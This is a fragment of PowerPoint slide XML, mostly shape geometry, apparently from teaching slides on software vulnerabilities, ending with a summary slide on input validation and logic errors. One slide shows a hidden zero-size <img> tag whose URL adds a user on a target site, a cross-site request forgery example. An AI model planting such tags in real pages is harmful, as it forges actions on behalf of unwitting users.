                <a:lnTo>
                  <a:pt x="495300" y="56387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546100" y="52334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596900" y="48680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647700" y="45407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698500" y="42494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749300" y="39920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800100" y="37666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="850900" y="35711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901700" y="34035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="952500" y="32618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1003300" y="31440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1041400" y="30480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1092200" y="29717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1155700" y="28955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282700" y="28955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1346200" y="29717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1397000" y="30468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="31425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498600" y="32606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549400" y="34030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1600200" y="35715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651000" y="37680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1701800" y="39944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1752600" y="42525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1803400" y="45441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1841500" y="48711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1892300" y="52354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1943100" y="56387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1993900" y="60197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2032000" y="64769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2082800" y="70057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2133600" y="75794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2184400" y="82351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2235200" y="90099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286000" y="99411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2336800" y="110655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2374900" y="124205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2387600" y="131063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2413000" y="143255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2413000" y="141731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2425700" y="148589"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2451100" h="303530">
                <a:moveTo>
                  <a:pt x="38100" y="141732"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="25400" y="143256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25400" y="148590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38100" y="141732"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2451100" h="303530">
                <a:moveTo>
                  <a:pt x="38100" y="162306"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="25400" y="155448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25400" y="160782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38100" y="162306"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2451100" h="303530">
                <a:moveTo>
                  <a:pt x="2425700" y="184403"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2425700" y="155447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2413000" y="162305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2413000" y="160781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2400300" y="167639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2387600" y="172973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2374900" y="179069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2336800" y="192668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286000" y="203973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2235200" y="213362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2184400" y="221210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2133600" y="227893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2082800" y="233787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2032000" y="239267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1993900" y="243077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1943100" y="247649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1892300" y="251585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1841500" y="255142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1803400" y="258341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1752600" y="261202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1701800" y="263745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651000" y="265990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1600200" y="267957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549400" y="269666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498600" y="271136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="272389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1397000" y="273443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1346200" y="274319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1092200" y="274319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1041400" y="273443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1003300" y="272389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="952500" y="271136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901700" y="269666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="850900" y="267957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800100" y="265990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749300" y="263745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698500" y="261202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647700" y="258341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596900" y="255142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546100" y="251585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="495300" y="247650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457200" y="243078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406400" y="239268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355600" y="233787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304800" y="227893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266700" y="221210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215900" y="213362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165100" y="203973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114300" y="192668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63500" y="179070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25400" y="160782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25400" y="192024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38100" y="199644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63500" y="206502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101600" y="220201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152400" y="231620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203200" y="241129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254000" y="249098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304800" y="255896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355600" y="261894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406400" y="267462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444500" y="272034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="495300" y="275844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546100" y="279869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596900" y="283508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647700" y="286776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698500" y="289692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749300" y="292275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800100" y="294541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="850900" y="296510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901700" y="298198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="952500" y="299625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1003300" y="300808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1041400" y="301765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1092200" y="302513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1155700" y="303275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282700" y="303275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1346200" y="302513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1397000" y="301764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="300810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498600" y="299632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549400" y="298212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1600200" y="296531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651000" y="294570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1701800" y="292309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1752600" y="289729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1803400" y="286812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1854200" y="283538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905000" y="279888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955800" y="275843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1993900" y="272033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2044700" y="267461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2082800" y="261969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2133600" y="255980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2184400" y="249128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2235200" y="241045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286000" y="231364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2336800" y="219718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2387600" y="205739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2413000" y="191261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2425700" y="184403"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2451100" h="303530">
                <a:moveTo>
                  <a:pt x="2425700" y="150113"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2425700" y="148589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2413000" y="146303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2425700" y="150113"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2451100" h="303530">
                <a:moveTo>
                  <a:pt x="2425700" y="155447"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2425700" y="153161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2413000" y="156971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2425700" y="155447"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2451100" h="303530">
                <a:moveTo>
                  <a:pt x="2438400" y="176783"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2438400" y="127253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2425700" y="120395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2425700" y="183641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2438400" y="176783"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2451100" h="303530">
                <a:moveTo>
                  <a:pt x="2451100" y="169163"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2451100" y="134111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2438400" y="133349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2438400" y="169925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2451100" y="169163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179061" y="3776726"/>
            <a:ext cx="448056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CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&gt;&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>sr</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>c=“ht</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>p://w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>.xyz.com/users.php?x=0&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10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600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>=add&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>=joe&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>…” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>width=“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-195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600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>height=“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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778502" y="3086100"/>
            <a:ext cx="132715" cy="717550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="132714" h="717550">
                <a:moveTo>
                  <a:pt x="51934" y="635476"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="28956" y="595884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25146" y="589026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16002" y="586740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286" y="594360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="602742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="609600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51816" y="691839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51934" y="635476"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132714" h="717550">
                <a:moveTo>
                  <a:pt x="66387" y="660380"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="51934" y="635476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51816" y="688848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54102" y="688848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54102" y="681228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66387" y="660380"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132714" h="717550">
                <a:moveTo>
                  <a:pt x="132588" y="603504"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="130302" y="594360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123444" y="590550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117348" y="586740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108204" y="589026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104394" y="595884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80889" y="635770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80772" y="688848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51816" y="688848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51816" y="691839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66294" y="717042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128778" y="610362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132588" y="603504"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132714" h="717550">
                <a:moveTo>
                  <a:pt x="82296" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="53340" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51934" y="635476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66387" y="660380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80889" y="635770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82296" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132714" h="717550">
                <a:moveTo>
                  <a:pt x="78486" y="681228"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="66387" y="660380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54102" y="681228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78486" y="681228"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132714" h="717550">
                <a:moveTo>
                  <a:pt x="78486" y="688848"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78486" y="681228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54102" y="681228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54102" y="688848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78486" y="688848"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132714" h="717550">
                <a:moveTo>
                  <a:pt x="80889" y="635770"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="66387" y="660380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78486" y="681228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78486" y="688848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80772" y="688848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80889" y="63577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38</a:t>
            </a:fld>
            <a:endParaRPr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962653" y="654811"/>
            <a:ext cx="266700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Part </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>I:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Summary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39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93902" y="1439672"/>
            <a:ext cx="8131809" cy="3327400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="57150" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="286385" marR="457834" indent="-273685">
              <a:lnSpc>
                <a:spcPts val="2810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94230"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-120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exist</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-55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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-80" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>programs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-114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due</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-85" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-75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lack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-95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or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-155" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>weak  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>input validation and logic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-405" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>errors</a:t>
            </a:r>
            <a:endParaRPr sz="26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0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="286385" indent="-273685">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94230"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>result </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>observable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>abnormal</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-340" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>behaviors</a:t>
            </a:r>
            <a:endParaRPr sz="26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295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2400" spc="-45" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>BOF, </a:t>
            </a:r>
            <a:r>
